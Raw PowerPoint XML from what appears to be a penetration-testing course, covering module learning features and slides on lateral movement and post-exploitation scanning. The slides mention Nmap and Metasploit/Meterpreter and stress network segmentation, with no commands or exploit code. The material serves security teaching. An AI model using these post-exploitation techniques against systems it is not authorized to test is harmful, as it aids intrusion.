            <a:off x="0" y="457200"/>
            <a:ext cx="8229600" cy="358140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>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r>
              <a:rPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>To facilitate learning, the following features within the UI may be included in this module:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" marR="0" lvl="0" indent="-169863"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Char char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="169863" marR="0" lvl="0" indent="-169863"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Char char="§"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>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endParaRPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEA739AB-83E7-3356-BA00-BC3B68876B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286638391"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="301658" y="1021326"/>
          <a:ext cx="8557528" cy="3013796"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2223828">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="200107645"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6333700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2648404099"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="265091">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Feature</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>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Avatar</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A virtual character representing a subject matter expert adds contextual information to the students' skills and helps them connect the dots by asking open-reflection questions. </a:t>
                      </a:r>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78002380"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="331556">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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Videos</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Practice</a:t>
                      </a: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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A variety of formats to help learners gauge content understanding.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="14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04576505"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="265091">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Hands-On Labs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Labs designed for working with physical equipment.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3727131555"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="265091">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Module Quizzes</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Self-assessments that integrate concepts and skills learned throughout the series of topics presented in the module.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="762923215"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="265091">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Module Summary</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Briefly recaps module content.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="21560770"/>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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Post-Exploitation Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="925183"/>
            <a:ext cx="8591907" cy="3337343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lateral movement involves scanning a network for other systems, exploiting vulnerabilities in other systems, compromising credentials, and collecting sensitive information for exfiltration. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lateral movement is possible if an organization does not segment its network properly. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" i="1">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Network segmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is therefore very important.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Testing the effectiveness of your network segmentation strategy is very important. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Your organization might have deployed virtual or physical firewalls, VLANs, or access control policies for segmentation, or it might use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>microsegmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> in virtualized and containerized environments. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You should perform network segmentation testing often to verify that your segmentation strategy is appropriate to protect your network against lateral movement and other post-exploitation attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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dirty="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38030937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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Post-Exploitation Scanning (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="925183"/>
            <a:ext cx="8591907" cy="1169957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>After compromising a system, you can use basic port scans to identify systems or services of interest that you can further attack to compromise valuable information (see the figure below).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can use some of scanning tools for active reconnaissance (such as Nmap) to perform scanning after exploitation, and you may also want to create your own. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F74BACA4-CD1A-23AA-B42C-6C148DFC337E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2823" y="2258786"/>
            <a:ext cx="410627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Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Alternatively, there are many tools, such as Metasploit, that have built-in scanning capabilities for post-exploitation (via Meterpreter).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagem 5" descr="Diagrama&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5E3CED-FDB7-D5E8-F1FF-7E53814805F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4580627" y="2344744"/>
            <a:ext cx="4112643" cy="2276342"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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dirty="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3670413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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Post-Exploitation Scanning (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="925183"/>
            <a:ext cx="8786001" cy="3024636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
